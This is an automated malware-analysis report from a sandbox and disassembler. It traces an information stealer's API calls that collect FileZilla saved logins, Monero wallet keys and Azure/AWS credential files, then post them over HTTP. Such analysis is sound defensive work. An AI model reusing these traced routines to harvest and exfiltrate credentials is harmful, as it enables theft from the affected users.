                  • GetProcessHeap.KERNEL32(00000000,000F423F,00940DBA,00940DB7,00940DB6,00940DB3), ref: 00930362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00930369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00930385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 009303CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 009303DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00930419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00930463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 00930532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00930562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00930571
                  • lstrcat.KERNEL32(?,url: ), ref: 00930580
                  • lstrcat.KERNEL32(?,00000000), ref: 00930593
                  • lstrcat.KERNEL32(?,00941678), ref: 009305A2
                  • lstrcat.KERNEL32(?,00000000), ref: 009305B5
                  • lstrcat.KERNEL32(?,0094167C), ref: 009305C4
                  • lstrcat.KERNEL32(?,login: ), ref: 009305D3
                  • lstrcat.KERNEL32(?,00000000), ref: 009305E6
                  • lstrcat.KERNEL32(?,00941688), ref: 009305F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00930604
                  • lstrcat.KERNEL32(?,00000000), ref: 00930617
                  • lstrcat.KERNEL32(?,00941698), ref: 00930626
                  • lstrcat.KERNEL32(?,0094169C), ref: 00930635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00940DB2), ref: 0093068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: cba32c0598786ae3e0689bafd853bc21da7c525c77e8ed526e6815f42e0a3871
                  • Instruction ID: 0af6e46c71fa7b184da71445204e4ec787c4047d635483e9598b707949fb044a
                  • Opcode Fuzzy Hash: cba32c0598786ae3e0689bafd853bc21da7c525c77e8ed526e6815f42e0a3871
                  • Instruction Fuzzy Hash: 6ED12B72D00208ABCB04EBF4DD96EEE7778AF94300F544518F142B7195EE74AA4ADF62
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009259F8
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00925A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00925B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0105E820,00000000,?,0105C6F0,00000000,?,00941A1C), ref: 00925E71
                  • lstrlen.KERNEL32(00000000), ref: 00925E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00925E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00925E9A
                  • lstrlen.KERNEL32(00000000), ref: 00925EAF
                  • lstrlen.KERNEL32(00000000), ref: 00925ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00925EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00925F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00925F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00925F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00925FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00925FBD
                  • HttpOpenRequestA.WININET(00000000,0105E810,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00925BF8
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • InternetCloseHandle.WININET(00000000), ref: 00925FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: c970b10435e9d0d1bdda970d0802c00141f4c3099360d70b37c2bb6a077b4a6f
                  • Instruction ID: 892daa2d1f0337a5d6c6895d156370e252757931d2f6f1be4701e414f4164cee
                  • Opcode Fuzzy Hash: c970b10435e9d0d1bdda970d0802c00141f4c3099360d70b37c2bb6a077b4a6f
                  • Instruction Fuzzy Hash: 6A12CD72820118AADB15EBA0DC95FEEB378BF94700F504199F146B3091EF746E49CF66
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0092D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D208
                  • lstrcat.KERNEL32(?,00941478), ref: 0092D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D22A
                  • lstrcat.KERNEL32(?,0094147C), ref: 0092D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D24C
                  • lstrcat.KERNEL32(?,00941480), ref: 0092D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D26E
                  • lstrcat.KERNEL32(?,00941484), ref: 0092D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D290
                  • lstrcat.KERNEL32(?,00941488), ref: 0092D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D2B2
                  • lstrcat.KERNEL32(?,0094148C), ref: 0092D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0092D2D4
                  • lstrcat.KERNEL32(?,00941490), ref: 0092D2E3
                    • Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
                    • Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885
                  • lstrlen.KERNEL32(?), ref: 0092D32A
                  • lstrlen.KERNEL32(?), ref: 0092D339
                    • Part of subcall function 0093AA70: StrCmpCA.SHLWAPI(01058DC0,0092A7A7,?,0092A7A7,01058DC0), ref: 0093AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0092D3B4
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 7aaf58955b07fad885baa56c3ce3aff3680f8eb0f198c366101af020b109d6c1
                  • Instruction ID: 7d96ccc95306e4dbb50c5f9510be7337f22523a45e3826919b5b2162f6ca74ba
                  • Opcode Fuzzy Hash: 7aaf58955b07fad885baa56c3ce3aff3680f8eb0f198c366101af020b109d6c1
                  • Instruction Fuzzy Hash: 66E1F972910108ABCB04EBA0DD96FEE7379AF94301F104158F147B70A1DE79AE0ADF66
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0105DDA0,00000000,?,0094144C,00000000,?,?), ref: 0092CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0092CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0092CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0092CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0092CAD9
                  • StrStrA.SHLWAPI(?,0105DDD0,00940B52), ref: 0092CAF7
                  • StrStrA.SHLWAPI(00000000,0105DE60), ref: 0092CB1E
                  • StrStrA.SHLWAPI(?,0105DB98,00000000,?,00941458,00000000,?,00000000,00000000,?,01058ED0,00000000,?,00941454,00000000,?), ref: 0092CCA2
                  • StrStrA.SHLWAPI(00000000,0105DB58), ref: 0092CCB9
                    • Part of subcall function 0092C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
                    • Part of subcall function 0092C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
                  • StrStrA.SHLWAPI(?,0105DB58,00000000,?,0094145C,00000000,?,00000000,01058EE0), ref: 0092CD5A
                  • StrStrA.SHLWAPI(00000000,01058FF0), ref: 0092CD71
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B46), ref: 0092C943
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B47), ref: 0092C957
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B4E), ref: 0092C978
                  • lstrlen.KERNEL32(00000000), ref: 0092CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0092CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 7da5857daf67fbccb3e57bf0ca00b70c67e9ed4b25e39ad84ddfd03b5c0ce1bc
                  • Instruction ID: f0a7227fc78ea891598f9e144d484d0440ce95500cef161096c79f89000650c0
                  • Opcode Fuzzy Hash: 7da5857daf67fbccb3e57bf0ca00b70c67e9ed4b25e39ad84ddfd03b5c0ce1bc
                  • Instruction Fuzzy Hash: C4E1FC72D00108ABDB14EBA4DC96FEEB778AF94300F404159F146B7191EF746A4ACF66
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0105ACD0,00000000,00020019,00000000,009405B6), ref: 009383A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
                  • wsprintfA.USER32 ref: 00938459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0093847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938499
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
                  • Instruction ID: c310345c30f9e9d7734b41571f9ad014d2e905d43fce03d412ea4030076ee267
                  • Opcode Fuzzy Hash: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
                  • Instruction Fuzzy Hash: CF810BB1910218ABDB24DB50CC95FEAB7B8FF88700F008699F14AA7180DF756B85CF95
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00934DCD
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
                    • Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943
                  • lstrcat.KERNEL32(?,00000000), ref: 00934E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00934E59
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                    • Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                    • Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00934EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00934EE5
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 009349B0
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,009408D2), ref: 009349C5
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 009349E2
                    • Part of subcall function 00934910: PathMatchSpecA.SHLWAPI(?,?), ref: 00934A1E
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,0105E730), ref: 00934A4A
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FF8), ref: 00934A5C
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A70
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FFC), ref: 00934A82
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A96
                    • Part of subcall function 00934910: CopyFileA.KERNEL32(?,?,00000001), ref: 00934AAC
                    • Part of subcall function 00934910: DeleteFileA.KERNEL32(?), ref: 00934B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 99f88c2adf9ffb5c36bc8f223cbd16740ba3642900bb43b61cc6f922172bd4a7
                  • Instruction ID: ff31aef8b711b03045ff37fc329634e358cbdcbbcffa4fc8e67dbb407463682b
                  • Opcode Fuzzy Hash: 99f88c2adf9ffb5c36bc8f223cbd16740ba3642900bb43b61cc6f922172bd4a7
                  • Instruction Fuzzy Hash: 1341517A94030466CB54F770EC47FED7738ABA4704F004494B689670C1EEB5ABC98F92
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0093906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: c343a8e65c877090fd39372a91787e53b7b843fba733ee094763d5b31ba51521
                  • Instruction ID: c96ec0e24fa1b0cb2613734448cc1524c36fa632c54ada5238c0b94cb282f036
                  • Opcode Fuzzy Hash: c343a8e65c877090fd39372a91787e53b7b843fba733ee094763d5b31ba51521
                  • Instruction Fuzzy Hash: 7C71A9B5910208ABDF04EBE4DD89FEEB7B9AF88700F108518F515A7294DB78A905CF61
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009331C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0093335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009334EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
